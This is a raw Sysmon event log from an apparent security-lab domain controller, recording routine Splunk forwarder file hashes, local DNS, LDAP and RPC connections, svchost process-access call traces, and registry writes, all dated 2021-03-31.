23542300x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C14C7F7EF4E5190AD9926D274E795681,SHA256=1998D7A8CB0081120B54BD052BBA01D6B616C9CEE96B21CFE6FB08E58C6351DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=94A01CC7FED522AC3153C5C2B16D3D98,SHA256=09CD46DCD7DA97E8524AE424136F3CCA8DF0ABCE9BD558E78B21903AB9F1E996,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=097D02346A2F243F2F9F9B23369B6BA8,SHA256=A73424EAB4075B4DFADE17BA9A2BC95527506D67BF375A67088400F29B474F7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7ACB7320EB5535B07F2FB54A2B050244,SHA256=703C0341B6D7810365CACE887F8110ECDCA7BF917825A088ECD52D784909E96E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=083ABA005816275FBAEC2BF1B5E7E62B,SHA256=8F2386522B3BCA2CFC5A05D2B6B424383752276D0793045B8CF10207653FBA14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.304{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56960- 354300x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56960-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 354300x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49704-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49704-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.275{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61421- 354300x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.275{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61421-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 354300x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.226{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49703-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.226{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49703-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.223{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49702-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.223{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49702-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.221{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49701-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49701-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 11241100x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.643{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\system32\taskhostw.exeC:\ProgramData\Microsoft\Crypto\OIDInfo\DsOIDInfo.dat2021-03-31 12:01:25.643 13241300x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.549{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000616) 354300x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.216{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57243- 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
